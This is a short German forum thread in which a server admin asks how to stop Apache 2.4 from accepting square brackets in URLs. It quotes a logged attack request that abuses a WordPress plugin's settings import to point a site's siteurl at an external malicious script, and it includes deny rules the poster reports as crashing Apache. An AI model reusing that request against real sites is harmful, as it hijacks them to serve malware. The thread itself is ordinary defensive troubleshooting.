Apache 2.4 Klammern [] in URL verbieten

[fulltilt]

Moien,
ich habe hier seit 4 Tagen alle möglichen Arten von redirect attacken auf Wordpress Installationen z.b.

Code: Alles auswählen

"POST /wp-admin/admin-post.php?nd_learning_value_import_settings=siteurl[nd_learning_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_learning_end_option] HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

ich war auch etwas verwundert darüber das im Apache überhaupt square brackets in URLs akzeptiert werden ...
Mein Versuch über LocationMatch zeigt im apache2ctl configtest zwar keine Fehler an, aber der Apache verabschiedet sich nach Einbau dieser Regeln:

Code: Alles auswählen

<LocationMatch "[nd_learning_option_value]">
    Order Deny,Allow
    Deny from all
</LocationMatch>

<LocationMatch "[*]">
    Order Deny,Allow
    Deny from all
</LocationMatch>

Wie bringe ich dem Apachen nun bei das er keine Klammern [] in URLs akzeptiert?

[uname]

Was stört dich wirklich? Nutzt du Wordpress? Ich denke [] zu unterbinden ist der falsche Weg.
Vielleicht kannst du Rewrite nutzen und alle [] umschreiben in irgendwas anderes. Aber auch das wird wohl nicht sinnvoll sein.

[fulltilt]

die versuchen damit iregndwelche Malware in die Webs zu ziehen so was in der Art:
https://securityboulevard.com/2018/08/m ... r-plugins/

Betrifft aber auch cleane neue WP Installationen wo dann ein ganzes Netzwerk von tausenden BadBots jeden Tag alles durch crawled und ne Mega Load erzeugt. Fail2ban ist im Einsatz mit einem Exploit Regex Filter, kommt aber immer wieder was neues ... wie gesagt auch auf neue Installationen wo keine Zusatzplugins usw. installiert sind. Ich würde deshalb gerne direkt in der Apache config einige Dinge verbieten ...

[fulltilt]

ich blocke erst mal die 404 alle ab (Google whitelisted) ... muss mir wg. dem WP injection Kram über URL noch was einfallen lassen, eventl. Mod-Security ...